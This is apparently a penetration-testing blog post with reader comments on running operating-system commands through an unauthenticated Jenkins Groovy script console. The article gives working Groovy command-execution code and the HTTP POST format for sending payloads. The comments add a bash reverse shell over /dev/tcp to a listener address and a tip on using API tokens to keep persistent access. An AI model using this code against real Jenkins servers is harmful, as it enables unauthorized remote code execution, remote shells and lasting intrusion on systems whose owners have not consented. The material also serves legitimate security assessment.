Hacking Jenkins Servers With No Password
Here’s a fun Jenkins trick I have been using on some recent information security assessments to gain an initial foothold. If you aren’t familiar with hacking Jenkins servers, it runs by default on port 8080 and, by default (at least in the 1.x releases current when this was written; Jenkins 2.x turns security on and generates an initial admin password during setup), it has no authentication at all (Hurray!). According to their wiki: “Jenkins is an award-winning application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.” Here is what Jenkins looks like.
This is some Groovy script right here – Jenkins
Conveniently, Jenkins has a native interpreter for the Groovy scripting language, which it selflessly offers up to you at the “/script” URL. Click on the “Manage Jenkins” link in the left-hand navigation pane and then “Script Console” from the main menu. Anything you type there runs inside the Jenkins JVM, as the operating-system user that Jenkins runs as. Here is what Jenkins gives you.
Let’s have some fun – Jenkins
Now, if you’re like me and you haven’t even heard of Groovy, much less know how to write it, you’re in luck, because it is in fact 2014 and we all have smart phones with unlimited access to the all-powerful Google Machine. Click on a few links here and there, skim through a few paragraphs, and you’ll see that we can use Jenkins to execute operating system commands from Groovy with the following:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
This doesn’t appear overly complex, but for the sake of completeness let’s walk through it:
- 1. We declare two objects of type “StringBuffer”, ‘sout’ and ‘serr’, to collect standard output and standard error.
- 2. Next we call Groovy’s .execute() method on a string, which should be a valid OS command, and store the resulting java.lang.Process in the variable ‘proc’. Note that String.execute() splits the string on whitespace to build the argument list, so a path or argument containing spaces needs the list form instead: ['cmd.exe', '/c', 'dir C:\\Program Files'].execute().
- 3. Grab the process output using the .consumeProcessOutput() method, passing in our two string buffers as per the method definition.
- 4. This line sets a timeout (in milliseconds) that will kill the process if it doesn’t finish on its own. Raise it for commands that take longer than a second, or the buffers will come back empty.
- 5. Finally we print the process output and any errors that were generated.
Cool, so that should be easy enough. Let’s paste that into the Jenkins console window and run some OS commands. All we need to do is substitute “[INSERT COMMAND]” with what we want to run. We’ll start with a simple “dir” command.
Damn! (shouted with an English accent for added flair) we got an error. Alright, let’s work this out. The error says “Cannot run program "dir": CreateProcess error=2, The system cannot find the file specified…” Well, that makes sense: “dir” isn’t an executable on the target system, it is a built-in command of cmd.exe, and .execute() can only launch real programs. Let’s tell Jenkins to run cmd.exe instead.
Getting closer. From the looks of it, Groovy just spawned an instance of cmd.exe, but we can’t interact with it: the shell sits waiting for input on stdin until the one-second timeout kills it, and nothing useful lands in our buffers. So let’s try passing the command via the /C parameter, which makes cmd.exe run a single command and exit. “cmd.exe /c dir” should do the trick. (On a Linux target the equivalent is “/bin/sh -c '…'”, and the same whitespace-splitting caveat applies.)
Executing Groovy Script Through Burp Suite- Jenkins
It may be necessary to feed your payload through an interception proxy like Burp Suite. This is extremely straightforward. Simply send a POST request to ‘/script’ with the Groovy in a form parameter named ‘script’ (Content-Type: application/x-www-form-urlencoded). Make sure to URL encode your script so that newlines, ampersands and plus signs survive the trip. If the target has CSRF protection enabled, the POST also needs a crumb (fetch one from /crumbIssuer/api/json and send it as a header), and a logged-in session cookie or basic auth if anonymous users can’t reach the console. Here is an example which should show you everything you need.
Conclusion – Jenkins
So there you have it: a simple, one-line-at-a-time command execution gateway, running with whatever privileges the Jenkins service account has. A valuable find when penetration testing. Surely you can think of creative ways to turn this access into something bigger and better, like a Meterpreter shell; I’ll leave that piece up to you. Also, it’s worth noting that there is a Metasploit module for this already (“Jenkins Script-Console Java Execution”). I have yet to be successful with it, but you might have different results, so be sure to check it out. Thank you for reading and, as always, hack responsibly!
Also, if you hit /scriptText instead of /script you can strip away all of the HTML output from the browser version, which makes it nice and scriptable with curl :)
Jenkins uses basic auth, so curl will take -u username:password ORRRR -u username:apitoken. The apitoken will survive a password rotation, so it’s a sneaky way to maintain persistence.
Thanks Savant, your input is highly valuable as usual!
You wouldn’t happen to be able to provide the HTTP request for any of the Groovy scripts mentioned above, would you? I’m trying to do this via Burp Repeater but can’t figure out the POST format to include a multi-line script.
Hi Jeff,
This is easy to accomplish. I have updated the article with a brief explanation and screenshot example. Hopefully that helps!
Below provides a nice reverse bash for linux hosts from the Jenkins script console, taken from pentestmonkey.
r = Runtime.getRuntime()
// pentestmonkey's bash reverse shell (the <> and <&5 | ... 2> pieces were eaten by the comment form);
// 10.0.0.0:8080 is the listener placeholder from the comment. \$line stops Groovy from interpolating it.
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/10.0.0.0/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Or just use the terminal plugin ;/
https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin